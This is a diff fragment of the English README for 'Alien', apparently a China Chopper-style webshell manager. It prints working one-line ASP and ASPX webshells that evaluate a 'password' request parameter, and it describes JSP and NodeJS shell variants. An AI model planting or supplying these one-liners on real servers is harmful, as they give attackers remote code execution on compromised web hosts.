iss4cf0ng/Alien/README_en.md

 ```<%execute(request("password"))%>```
 - ASPX
 ```<%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>```
 Also, Alien support asmx , ashx webshell

+## JSP webshell
+Original chopper jsp shell, but some addition.\
+it can display image

+## NodeJS webshell
+Differenti to php, asp, aspx, jsp...\
+It is difficult to use in pentestation, but use in management.

 ## Server Manager
 - MySQL : PHP